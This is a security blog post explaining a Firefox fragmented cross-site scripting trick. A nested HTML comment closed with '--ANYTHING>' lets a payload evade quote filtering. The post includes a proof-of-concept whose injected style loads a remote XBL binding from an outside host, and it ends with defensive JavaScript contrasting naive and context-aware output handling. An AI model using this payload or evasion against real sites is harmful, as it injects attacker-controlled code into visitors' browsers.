Martin Paul Eve

Professor of Literature, Technology and Publishing at Birkbeck, University of London

Following on from a post on sla.ckers, it emerges that Firefox has a vulnerability/bug that is very difficult to filter against and that allows a fragmented XSS attack (the payload is split across two separate injection points).

This is best illustrated by the following example:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
	"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
	<head>
		<title>test</title>
	</head>
	<body>
		<!-- This is the first injection point: -- -->
		<a href="This is the second injection point: --evadefilter>
		<b style=-moz-binding:url('http://www.md5-db.com/STXSS_XBL.xml#loader') />
		<a href=test ">link</a>
	</body>
</html>

The conditions for the XSS working are two injection points. Injection point 1 must be inside an HTML comment, whilst injection point 2 is inside a double-quoted attribute. Here is the above markup with the two points marked to illustrate this:

<!-- This is the first injection point: HERE -->
<a href="This is the second injection point: HERE">

If the first injection point is given as -- (no quotes), a nested comment is begun. Injection point 2 should then contain --> or --ANYTHING> (which Firefox renders as a valid comment closing tag) to close the comment. At this point the remainder of the input is written directly into the document rather than inside the attribute, all without using the " character, which is the one most likely to be filtered.
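The practical lesson is that filtering on the " character alone does nothing for either of these contexts. The following is an added example, not code from the original post: it puts the quote-only filter side by side with context-aware handling of the two injection contexts described above. Attribute values get standard HTML-attribute encoding; comment bodies are not entity-decoded, so the only option there is to remove the delimiter sequences themselves. The function names, the template and the sample inputs are this example's own constructions.

```javascript
// Added example, not code from the original post. It contrasts the quote-only
// filter the post says is likely in place with context-aware output handling
// for the two injection contexts described above: an HTML comment body and a
// double-quoted attribute value. Function names are this example's own.

// Encode a value destined for a double-quoted HTML attribute. Replacing
// & < > " ' leaves nothing that can terminate the attribute or be read as
// markup if the surrounding context has been disturbed.
function encodeForHtmlAttribute(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Neutralise a value destined for an HTML comment body. Comment contents are
// not entity-decoded, so encoding does not help; the delimiter sequences
// themselves have to go. Any run of two or more hyphens collapses to one and
// '>' is removed, so "--", "-->" and "--ANYTHING>" cannot appear in the output.
function sanitizeForHtmlComment(value) {
  return String(value).replace(/-{2,}/g, '-').replace(/>/g, '');
}

// The filter the post argues is insufficient: it only strips double quotes.
function naiveQuoteFilter(value) {
  return String(value).replace(/"/g, '');
}

// Check the two handled fragments for anything that could still change
// parsing: a hyphen pair inside the comment (nested comment delimiter) or a
// quote/angle bracket inside the attribute (attribute or tag breakout).
function audit(first, second, { comment, attribute }) {
  const c = comment(first);
  const a = attribute(second);
  return {
    commentHasDelimiter: /--/.test(c),
    attributeHasBreakout: /["<>]/.test(a),
  };
}

// Render the two injection points from the post with a chosen pair of
// handlers. Constructed template that mirrors the post's illustration.
function render(first, second, handlers) {
  return [
    `<!-- This is the first injection point: ${handlers.comment(first)} -->`,
    `<a href="This is the second injection point: ${handlers.attribute(second)}">`,
  ].join('\n');
}

const naive = { comment: naiveQuoteFilter, attribute: naiveQuoteFilter };
const hardened = { comment: sanitizeForHtmlComment, attribute: encodeForHtmlAttribute };

// Constructed inputs shaped like the post's description: "--" for the comment
// and a "--ANYTHING>" sequence for the attribute.
const firstInput = '--';
const secondInput = '--evadefilter>';

console.log('quote-only filter:', audit(firstInput, secondInput, naive));
console.log('context-aware:    ', audit(firstInput, secondInput, hardened));
console.log(render(firstInput, secondInput, hardened));
```

With the quote-only filter both checks fire, because neither the hyphen pair nor the closing bracket contains a quote. With the context-aware handlers the comment body keeps a single hyphen and the attribute value keeps its hyphens but loses the raw >, so the comment is never re-opened and the attribute is never broken out of. The wider point is that output handling has to be chosen per context at the point of insertion; a single global character filter cannot know which of these contexts a value will land in.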

Thanks to tx and thornmaker at sla.ckers for work on this!